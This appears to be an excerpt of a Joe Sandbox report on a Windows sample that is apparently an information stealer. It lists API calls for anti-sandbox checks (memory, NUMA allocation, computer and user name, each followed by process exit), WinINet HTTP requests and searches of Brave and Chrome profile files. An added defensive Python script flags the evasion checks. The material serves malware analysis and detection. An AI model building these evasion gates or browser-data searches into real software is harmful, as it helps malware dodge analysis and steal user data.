                                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,008267A8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                                        • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                                        • Sleep.KERNEL32(00001770), ref: 00416B04
                                                        • CloseHandle.KERNEL32(?,00000000,?,008267A8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                                        • ExitProcess.KERNEL32 ref: 00416B22
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                        • String ID:
                                                        • API String ID: 3511611419-0
                                                        • Opcode ID: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                                        • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                                                        • Opcode Fuzzy Hash: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                                        • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE
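The subcall lines of the startup routine above show the same shape three times: a helper queries the machine (GetSystemInfo at 00401160, VirtualAllocExNuma at 00401110, GlobalMemoryStatusEx at 00401220, whose own listing appears further down) and has an ExitProcess in its body, so the sample quits if the answer looks like a sandbox. The Python below is an added example, not part of the Joe Sandbox report and not the sample's code: it parses the report's "• Part of subcall function …" lines as printed on this page and flags helpers that probe the environment and can end in ExitProcess. The input text is copied from this report; the probe table and the scoring rule (only helper scopes are scored, because the outer routine's ExitProcess at 00416B22 is its normal termination) are the example's own assumptions.

```python
import re

# Input constructed from the API lines of the startup routine above and its
# subcalls, copied from this report. Nothing here talks to a live system.
REPORT_LINES = """\
• Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
• Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
• Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
• Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
• Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
• Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
• Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
• Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
• Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
• Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
• GetUserDefaultLCID.KERNEL32 ref: 00416A26
• Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
• OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000), ref: 00416ACA
• Sleep.KERNEL32(00001770), ref: 00416B04
• ExitProcess.KERNEL32 ref: 00416B22
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<scope>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[^.\s(]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)

# What each probe measures; sandboxes and emulators often give small or odd
# answers here. The table is this example's assumption, not the report's.
ENVIRONMENT_PROBES = {
    "GetSystemInfo": "processor count / page size",
    "VirtualAllocExNuma": "NUMA-aware allocation, fails on some emulators",
    "GlobalMemoryStatusEx": "physical RAM size",
    "GetUserDefaultLangID": "default UI language",
    "GetUserDefaultLCID": "default locale",
}


def parse_calls(text):
    """Return [(scope, api, args, ref)] in report order.

    scope is the subcall address the report attributes the call to, or None
    for calls made directly by the analysed function.
    """
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m is None:
            continue
        args = m["args"].split(",") if m["args"] else []
        calls.append((m["scope"], m["api"], args, m["ref"]))
    return calls


def find_exit_gated_probes(calls):
    """Return [(scope, probe_api, probe_ref, exit_ref)] for helpers that
    measure the environment and can end in ExitProcess.

    Only subcalls are scored. The analysed routine itself also ends in
    ExitProcess (ref 00416B22), but that is its normal termination, not a gate.
    """
    by_scope = {}
    for scope, api, _args, ref in calls:
        if scope is not None:
            by_scope.setdefault(scope, []).append((api, ref))
    hits = []
    for scope, seq in by_scope.items():
        for i, (api, ref) in enumerate(seq):
            if api not in ENVIRONMENT_PROBES:
                continue
            exits = [r for a, r in seq[i + 1:] if a == "ExitProcess"]
            if exits:
                hits.append((scope, api, ref, exits[0]))
    return hits


def describe(hits):
    return ["%s: %s (%s) -> ExitProcess @ %s" % (scope, api, ENVIRONMENT_PROBES[api], exit_ref)
            for scope, api, _ref, exit_ref in hits]


if __name__ == "__main__":
    for line in describe(find_exit_gated_probes(parse_calls(REPORT_LINES))):
        print(line)
```

Run stand-alone it reports the three gated helpers and nothing else: 00416770 queries the language but has no ExitProcess of its own, and the OpenEventA/Sleep pair at the end is the routine's single-instance wait rather than an environment probe. The thresholds the sample compares against (how much RAM, how many processors) are not visible in the report, so the script reports the shape of the check, not its values.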

                                                        Control-flow Graph

                                                        APIs
                                                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                        • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ??2@$CrackInternetlstrlen
                                                        • String ID: <
                                                        • API String ID: 1683549937-4251816714
                                                        • Opcode ID: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                                        • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                                                        • Opcode Fuzzy Hash: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                                        • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

                                                        Control-flow Graph

                                                        • Graph image not extracted. Basic blocks 401220-40129d; API calls GlobalMemoryStatusEx, ExitProcess; internal calls 4189b0, 41da00.
                                                        APIs
                                                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                        • __aulldiv.LIBCMT ref: 00401258
                                                        • __aulldiv.LIBCMT ref: 00401266
                                                        • ExitProcess.KERNEL32 ref: 00401294
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                        • String ID: @
                                                        • API String ID: 3404098578-2766056989
                                                        • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                        • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                                                        • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                        • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

                                                        Control-flow Graph

                                                        • Graph image not extracted. Basic blocks 416aba-416b22; API calls OpenEventA, CreateEventA, CloseHandle, Sleep, ExitProcess; internal calls 41aad0, 416920, 415b10.
                                                        APIs
                                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,008267A8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                                        • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                                        • Sleep.KERNEL32(00001770), ref: 00416B04
                                                        • CloseHandle.KERNEL32(?,00000000,?,008267A8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                                        • ExitProcess.KERNEL32 ref: 00416B22
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                        • String ID:
                                                        • API String ID: 941982115-0
                                                        • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                                        • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                                                        • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                                        • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                                                        APIs
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                          • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,0082B8A0), ref: 00406303
                                                          • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                          • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,0082B1A0,00000000,00000000,00400100,00000000), ref: 00406385
                                                          • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                          • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                                        • String ID: ERROR$ERROR
                                                        • API String ID: 3287882509-2579291623
                                                        • Opcode ID: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                                        • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                                                        • Opcode Fuzzy Hash: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                                        • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                        • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocComputerNameProcess
                                                        • String ID:
                                                        • API String ID: 4203777966-0
                                                        • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                        • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                                                        • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                        • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                                        • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                                        • ExitProcess.KERNEL32 ref: 00401143
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$AllocCurrentExitNumaVirtual
                                                        • String ID:
                                                        • API String ID: 1103761159-0
                                                        • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                        • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                                                        • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                        • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007FBFEE
                                                        • Module32First.KERNEL32(00000000,00000224), ref: 007FC00E
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008531907.00000000007FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 007FB000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7fb000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 3833638111-0
                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                        • Instruction ID: 509a56d80a7e48d6873114e1eaf7c8e57f4f5b36413251d6bfdfd839b6610e07
                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                        • Instruction Fuzzy Hash: 4BF06231600719ABE7203AF59D8DA7AB6E8AF49725F100528F746911C0DB74E9468A61
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000400,?,?,00B20223,?,?), ref: 00B20E19
                                                        • SetErrorMode.KERNEL32(00000000,?,?,00B20223,?,?), ref: 00B20E1E
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                        • Instruction ID: d3d99cc04f1a8f684d5fd2d77414d8ee9fb87755c6d3df6a29803a24b718521b
                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                        • Instruction Fuzzy Hash: 21D0123154512877D7003A94DC09BCD7B5CDF09B62F008451FB0DD9081C770994047E5
                                                        APIs
                                                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                                                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Virtual$AllocFree
                                                        • String ID:
                                                        • API String ID: 2087232378-0
                                                        • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                                        • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                                                        • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                                        • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                                                        APIs
                                                          • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                          • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                          • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                          • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                          • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                          • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                        • ExitProcess.KERNEL32 ref: 004011C6
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$Process$AllocName$ComputerExitUser
                                                        • String ID:
                                                        • API String ID: 1004333139-0
                                                        • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                                        • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                                                        • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                                        • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                                                        APIs
                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 007FBCD6
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008531907.00000000007FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 007FB000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7fb000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                        • Instruction ID: ec050bc399ca7574f0874c409f9df509c38949f6f614b7ba4b54c401afd29d37
                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                        • Instruction Fuzzy Hash: E1113C79A00208EFDB01DF98C985E98BBF5AF08350F158094FA489B362D375EA50DF90
                                                        APIs
                                                        • wsprintfA.USER32 ref: 004138CC
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                                                        • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                                        • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                                        • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                                        • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                        • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                                        • API String ID: 1125553467-817767981
                                                        • Opcode ID: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                                        • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                                                        • Opcode Fuzzy Hash: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                                        • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
                                                        • StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
                                                        • StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
                                                        • FindClose.KERNEL32(000000FF), ref: 0040C7D1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                                        • API String ID: 3334442632-726946144
                                                        • Opcode ID: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                                        • Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
                                                        • Opcode Fuzzy Hash: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                                        • Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA
                                                        APIs
                                                        • wsprintfA.USER32 ref: 0041492C
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                        • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
